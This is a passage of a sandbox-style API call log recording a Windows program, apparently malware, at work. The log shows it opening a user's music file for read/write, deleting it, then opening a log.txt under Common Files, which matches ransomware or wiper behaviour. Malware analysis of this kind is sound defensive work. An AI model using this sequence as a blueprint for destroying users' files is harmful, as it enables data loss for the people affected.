dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0037.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0037.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0037.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0037.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0037.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0037.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0037.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0037.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0037.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0037.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0037.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0037.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0037.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0037.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0037.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0037.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0037.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0037.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0037.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0037.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0037.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0037.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0037.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0037.309] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0037.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0037.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0037.309] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0037.309] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.309] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3lV09D8.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3lv09d8.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0037.309] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0037.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0037.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0037.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0037.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0037.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0037.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0037.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0037.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0037.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0037.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0037.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0037.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0037.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0037.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0037.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0037.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0037.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0037.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0037.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0037.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0037.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0037.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0037.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0037.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0037.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0037.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0037.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0037.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0037.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0037.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0037.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0037.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0037.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0037.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0037.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0037.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0037.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0037.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0037.311] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0037.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0037.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0037.311] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.311] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.311] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0037.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0037.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0037.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0037.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0037.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0037.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0037.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0037.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0037.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0037.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0037.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0037.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0037.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0037.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0037.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0037.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0037.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0037.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0037.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0037.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0037.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0037.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0037.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0037.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0037.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0037.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0037.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0037.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0037.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0037.312] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0037.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0037.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0037.312] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.312] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.312] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0037.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0037.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0037.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0037.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0037.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0037.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0037.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0037.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0037.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0037.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0037.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0037.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0037.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0037.313] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3lV09D8.m4a", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3lV09D8.m4a", lpFilePart=0x0) returned 0x2f [0037.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0037.313] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3lV09D8.m4a", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa571aff0, ftCreationTime.dwHighDateTime=0x1d5ba57, ftLastAccessTime.dwLowDateTime=0x2c45c810, ftLastAccessTime.dwHighDateTime=0x1d5c5b9, ftLastWriteTime.dwLowDateTime=0x15f2dd80, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x17317, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="3lV09D8.m4a", cAlternateFileName="")) returned 0x7c2100 [0037.313] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3lV09D8.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3lv09d8.m4a")) returned 1 [0037.315] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa571aff0, ftCreationTime.dwHighDateTime=0x1d5ba57, ftLastAccessTime.dwLowDateTime=0x2c45c810, ftLastAccessTime.dwHighDateTime=0x1d5c5b9, ftLastWriteTime.dwLowDateTime=0x15f2dd80, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x17317, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="3lV09D8.m4a", cAlternateFileName="")) returned 0 [0037.315] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0037.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0037.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0037.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0037.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0037.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0037.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0037.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0037.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0037.315] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0037.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0037.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0037.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0037.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0037.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0037.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0037.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0037.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0037.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0037.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0037.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0037.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0037.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0037.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac320 | out: hHeap=0x770000) returned 1 [0037.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0037.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0037.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0037.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0037.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0037.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0037.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0037.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0037.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0037.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0037.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0037.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0037.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0037.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0037.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0037.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0037.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0037.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0037.316] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.316] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0037.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0037.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0037.316] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.316] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.316] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.316] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.316] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0037.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0037.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0037.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0037.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0037.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0037.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0037.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0037.316] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.317] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.317] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.317] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.317] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0037.317] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0037.317] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0037.317] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0037.317] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0037.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0037.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0037.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0037.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0037.317] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0037.317] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x2143, lpOverlapped=0x0) returned 1 [0037.317] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0037.317] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x2143, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: 